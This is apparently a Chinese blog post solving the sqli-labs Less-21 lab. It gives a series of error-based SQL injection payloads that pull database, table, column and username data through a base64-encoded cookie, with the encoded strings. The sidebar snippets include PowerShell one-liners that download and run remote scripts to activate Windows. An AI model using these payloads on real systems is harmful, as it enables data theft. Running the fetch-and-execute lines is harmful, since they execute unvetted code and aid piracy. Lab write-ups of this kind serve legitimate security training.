【网络安全】sqli-labs Less-21 解题详析

原创 已于 2025-09-14 08:34:40 修改 · 4.1k 阅读 · 1 ·
CC 4.0 BY-SA版权
原创文章,禁止转载,否则保留追究法律责任的权利。
文章标签:

#web安全 #数据库 #sql #sqlilabs #报错注入

于 2023-08-02 16:27:19 首次发布
本文详细解析了如何在基于Base64加密的环境中进行Cookie注入,涉及手工注入、sqlmap加密注入、报错注入方法,以及mid函数的应用,展示了在网络安全课程中Sqli-LabsLess-21的解题过程。

文章目录

正文

该题考察base64加密的cookie注入

该题有两种注入方式,本文分享手工注入知识,另一种是sqlmap加密注入。

sqlmap加密注入参考: 【网络安全】sqlmap加密注入教程+实战详析

在这里插入图片描述
经测试得到正确的用户名dumb,密码dumb并抓包

在这里插入图片描述

RHVtYg%3D%3D 经过base64解密得到 Dumb ,故可利用cookie参数进行sql语句注入

该题采用报错注入,原理及姿势可参考:【报错注入 | sqli-labs Less-5实战】

查库名

Dumb') and extractvalue(1,concat(0x23,database()))#

这里构造’)的原因可通过页面回显得出,不再赘述。

经过加密得到:

RHVtYicgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDIzLGRhdGFiYXNlKCkpKSM=

在这里插入图片描述
可知库名为security

查表名

Dumb') and extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema = database())))#

加密后得到:

RHVtYicpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHgyMywoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hID0gZGF0YWJhc2UoKSkpKSM=

在这里插入图片描述
得到四个表名

查列名

Dumb') and extractvalue(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users')))#

加密后得到

RHVtYicpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHgyMywoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWEgPSBkYXRhYmFzZSgpIGFuZCB0YWJsZV9uYW1lID0gJ3VzZXJzJykpKSM=

得到三个列:

在这里插入图片描述

查数据

该姿势使用到mid函数,参考文章: 【mid函数原理、应用及实战讲解】

以获取username列的数据为例,利用mid函数构造POC:

Dumb') and extractvalue(1,concat(0x23,mid((select group_concat(username) from users),1,32)))#

加密后得到:

RHVtYicpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHgyMyxtaWQoKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUpIGZyb20gdXNlcnMpLDEsMzIpKSkj

结果如图:

在这里插入图片描述
接着,我们提取从第 32 个字符开始的长度为 32 的子字符串:

POC如下:

Dumb') and extractvalue(1,concat(0x23,mid((select group_concat(username) from security.users),32,32)))#

加密后得到:

RHVtYicpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHgyMyxtaWQoKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUpIGZyb20gc2VjdXJpdHkudXNlcnMpLDMyLDMyKSkpIw==

结果如图:

在这里插入图片描述

总结

以上为【网络安全】sqli-labs Less-21 解题详析,考察base64加密、报错注入、mid函数等知识点及姿势,后续将分享【网络安全】sqli-labs Less-22 解题详析。

YOLOv5的Tricks | 【Trick1】关于激活函数Activation的改进汇总
Clichong
06-01 7754
如有错误,恳请指出。在yolov5模型搭建的过程实现中,额外实现了很多非常新奇有趣的激活函数,不再是的简单nn.ReLU等,所以这里使用这篇笔记来对这一些列的激活函数进行总结归纳。关于激活函数,在很早之前我写过一篇笔记介绍,笔记链接:激活函数与Loss函数求导,在这里主要介绍的是目标检测yolov5算法中实现的一些的激活函数,主要设计ReLU函数及其变体,包含ReLU,PReLU,RReLU,FReLU,Swish,Mish,Acon系列,Dynamic ReLU系列。ReLU相比之前的 Sigmoid/t
新系统 win 激活/绕过联网的方法
Don't Look Down的博客
02-20 2347
打开 PowerShell 或终端(不是 CMD)或者,可以使用以下内容(将来将弃用)。使用下面提供的链接下载文件。复制粘贴 Enter 执行。
windows和office微软官方免费激活教程
oushaojun2的专栏
08-08 3万+
微软提供了windows系统和office的官方免费激活,其实不用去买什么激活码,官方提供了激活方式,完全免费。
激活win11系统
最新发布
blaccck的博客
11-03 1878
2.输入代码irm https://get.activated.win|iex按回车等一会。4.等到显示press any key to go back时直接关闭窗口即可。3.在新弹出的命令框里按键盘上的数字1再等一会。1.开始菜单选择powershell管理员。
Ubuntu 9.10下在右键中添加"以管理员身份打开","在终端中打开"
xiangyunl的专栏
06-18 1751
<br />   在使用Linux时经常需要管理员权限, 经常需要再终端中操作, 如果把他们加入右键那就方便多了. 不多说, 方法如下:<br />   右键中添加"以管理员身份打开"<br />      在终端输入  sudo apt-get install nautilus-gksu, 然后回车就可以了.<br />   右键中添加"在终端中打开"<br />      在终端输入  sudo apt-get install nautilus-open-terminal<br />   然后重新启动电
win10激活
07-29 3734
win10激活
电脑右下角的出现:激活windows转到设置以激活windows
m0_72663698的博客
11-16 7927
1,按住键盘上的win+R,输入:powershell。4,然后出来的窗口,在下面输入:1,回车等待激活。2,输入一串代码:irm。3,弹出来的命令窗,选,是。5,最后激活成功显示这样。
win11 1
一行真人
07-24 1001
win11 1
虚拟机问题解决记录 1
PiperNigrum的博客
09-21 1710
VBoxGuestAdditions 在安装系统时载入【设备 → 增强功能】。拓展包在安装 VitualBox 完后安装【管理 → 全局设定 → 扩展】。,host 和 guest 共享剪切板、文件等)。| iex】,输入数字时选【1】。,会导致关机之后无法正常打开。解决办法:在终端输入【irm。从 U.S. 改为 U.K.Windows11 的。需要同时下载拓展包【勾选【启动 EFI】
Microsoft Windows | office
憨憨靓仔的博客
10-19 850
Microsoft Windows|office
记录一下,在PowerShell执行iex(irm ‘https://img.lelaer.com/gf.ps1‘)时发生如下报错的解决方法之一
m0_55937000的博客
11-18 1万+
在PowerShell执行如下代码。
steam假入库的trick
Just_Monika_s的博客
09-24 2万+
冰汽时代2出了,貌似是因为故意给玩家道德抉择的缘故,导致网上充斥不少骂声。正巧本人刚刚玩了一代冰汽时代,之后被灵魂拷问“这一切值得吗?”,随即怀疑人生,就像一个震碎三观的炸弹飞了过来,给我本就没多正的三观震的更加稀碎。于是就想看看第二部11bit拉的史到底是什么口味的。但是我还不怎么想花钱挨拷问赤石,还懒得steam两小时退款,还懒得找盗版资源,那么我该怎么办捏?于是打开万能淘宝发现一个6.25r的《冰汽时代2》,寻思这个大概率是共享或者盗版之类,不过不想花时间,不想花精力,那只能小花点钱呗。
Transformer是什么?看完这篇你就醍醐灌顶
热门推荐
fs1341825137的博客
09-15 6万+
前言 由谷歌团队提出的预训练语言模型BERT近年来正在各大自然语言处理任务中屠榜(话说学者们也挺有意思的,模型名都强行凑个芝麻街的人物名,哈哈哈)。 BERT算法的最重要的部分便是Transformer的概念,它本质上是Transformer的编码器部分。 而Transformer是什么呢?transformer是永远的神,自从transformer使用了抛弃rnncnn的纯attention机制之后,各种基于transformer结构的预训练模型都如雨后春笋般雄起,而transformer中最重要就是使用
小白使用超算slurm作业调度系统提交作业(看完这篇就够了)
qq_43155641的博客
03-21 8790
上传项目文件到超算,安装conda后,超算平台本身没有GPU,用sinfo查看后,如何调用GPU来运行项目?那就需要slurm作业调度系统来提交作业(其实就是提交项目,让他调用GPU来运行项目)
激活函数(Activation Function)
weixin_39910711的博客
03-17 5万+
深度学习领域最常用的10个激活函数,一文详解数学原理及优缺点:https://mp.weixin.qq.com/s/bleTRzA_1X3umR5UXSpuHg 深度学习中几种常见的激活函数理解与总结:https://www.cnblogs.com/XDU-Lakers/p/10557496.html 神经网络梯度消失和梯度爆炸及解决办法:https://blog.youkuaiyun.com/program_developer/article/details/80032376 常用激活函...
大模型学习笔记------Llama 3模型架构之RMS Norm与激活函数SwiGLU
gz7seven
03-08 1295
本文主要讲解Llama 3模型中RMS Norm归一化与激活函数SwiGLU,以及与相关传统方法的对比分析。
两条指令帮你激活你的windows系统(windows10和windows11)
winnerofeveryone的博客
09-28 357
用管理员运行powershell输入指令,按照提示选择就行(一般就是选1)
Window11系统快速激活
2401_86634668的博客
03-07 3839
Window11快速激活
matlab运行完代码没了
07-04
示例代码尽量简单,像用plot之后加个shg(show graph)这种小技巧就很实用。用户引用的那个Java报错有点奇怪,看起来像是MATLAB的GUI底层报错。不过这种情况很少见,优先级可以放低,先解决常见操作问题为主。好的,...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值